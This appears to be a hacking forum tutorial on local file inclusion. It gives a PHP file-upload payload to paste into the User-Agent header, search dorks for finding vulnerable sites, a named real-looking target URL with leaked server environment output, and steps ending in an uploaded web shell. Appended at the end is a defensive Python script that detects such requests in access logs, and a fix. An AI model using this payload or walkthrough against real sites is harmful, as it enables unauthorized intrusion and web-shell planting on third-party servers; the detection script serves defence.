Assalamualaikum, today I'm going to teach you Local File Inclusion [LFI].
What you need:
* Google Chrome
* User Agent For Chrome
User Agent For Chrome is available here:
https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg
Install the User Agent extension first. Once it is installed, an icon appears at the top right of the browser.
Click it, then click Settings.
Fill in the boxes as written below.
New User-agent name >> LFI
New User-Agent String >> <?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>Code-Newbie</p><br>
<form action="" method="post" enctype="multipart/form-data">Filename: <input type="file" name="file" /><input type="submit" value="Submit" />
Group >> LFI
Append? >> Replace
Indicator Flag >> LFI
Okay, then press Add.
OK, now all that's left is to find a website.
Dork :- allinurl:?index.php?pagina=contato.php site:br
allinurl:?index.php?page=contact.php
allinurl:?index.php?pagina=noticias.php site:br
http://pastebin.com/rKWHFHVT
You can change the dork.
OK, pick one of the websites, for example http://www.open-isb.com.br/index.php?pagina=noticias.php
Change the part after "=": replace noticias.php with %2Fproc%2Fself%2Fenviron, so it becomes
http://www.open-isb.com.br/index.php?pagina=%2Fproc%2Fself%2Fenviron
If the site is vulnerable, it will output:
DOCUMENT_ROOT=/home/open-isb/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.3HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8HTTP_COOKIE=__utma=94620866.542769388.1366547884.1366547884.1366547884.1; __utmz=94620866.1366547884.1.1.utmccn=(referral)|utmcsr=facebook.com|utmcct=/l.php|utmcmd=referralHTTP_HOST=www.open-isb.com.brHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31HTTP_X_FORWARDED_FOR=203.106.157.12HTTP_X_VARNISH=1706120852LOG_SUBDIR=open-isbPATH=/bin:/usr/binPHPRC=/home/open-isbQS_AllConn=95QS_ConnectionId=13675908865048115804886QS_SrvConn=95QUERY_STRING=pagina=%2Fproc%2Fself%2FenvironREDIRECT_STATUS=200REMOTE_ADDR=203.106.157.12REMOTE_PORT=35382REQUEST_METHOD=GETREQUEST_URI=/index.php?pagina=%2Fproc%2Fself%2FenvironSCRIPT_FILENAME=/home/open-isb/public_html/index.phpSCRIPT_NAME=/index.phpSERVER_ADDR=187.45.193.219SERVER_ADMIN=webmaster@open-isb.com.brSERVER_NAME=www.open-isb.com.brSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=SERVER_SOFTWARE=ApacheSUPHP_URI=/index.phpUNIQUE_ID=UYPH5rstwdsAABMWaCsAAACe
If you see that, click
and choose LFI,
after clicking LFI, click LFI again.
OK, the site will then allow you to upload a shell :)
Open the shell: http://www.open-isb.com.br/shell.php
Good Luck :)
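
Seen from the server side, the two requests in this walkthrough leave distinct traces in the access log: a page parameter that decodes to /proc/self/environ, and a User-Agent header carrying a PHP open tag. The script below is an added example (not part of the original post) that flags both in combined-format log lines; the sample lines, addresses and function names are constructed, and it also flags any absolute or `../` path in a parameter, which goes slightly beyond the single case shown here.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)
# Heuristic: a page-selector value should be a bare file name, never an
# absolute path, a ../ sequence, or /proc/self/environ.
SUSPECT_PATH = re.compile(r'^/|\.\./|/proc/self/environ')
PHP_TAG = re.compile(r'<\?(php|=)', re.I)  # never valid in a User-Agent


def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (%252F -> %2F -> /)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    findings = []
    # parse_qsl decodes once; decode_fully catches double encoding.
    for name, raw in parse_qsl(urlsplit(m["target"]).query):
        value = decode_fully(raw)
        if SUSPECT_PATH.search(value):
            findings.append(f"lfi-path:{name}={value}")
    if PHP_TAG.search(m["ua"]):
        findings.append("code-in-user-agent")
    return findings


# Constructed sample lines (documentation addresses, placeholder payload).
_PRE = '198.51.100.7 - - [04/May/2013:10:0%d:00 +0000] "GET /index.php?pagina=%s HTTP/1.1" 200 1893 "-" "%s"'
SAMPLE = [
    _PRE % (1, "noticias.php", "Mozilla/5.0 (Windows NT 6.1)"),
    _PRE % (2, "%2Fproc%2Fself%2Fenviron", "Mozilla/5.0 (Windows NT 6.1)"),
    _PRE % (3, "%2Fproc%2Fself%2Fenviron", "<?php /* placeholder */ ?>"),
]

if __name__ == "__main__":
    print(*map(inspect, SAMPLE), sep="\n")
```

A hit on both findings from the same client within a short window is the pattern worth alerting on; the underlying fix is still to map the page parameter to a fixed list of file names instead of passing it to include.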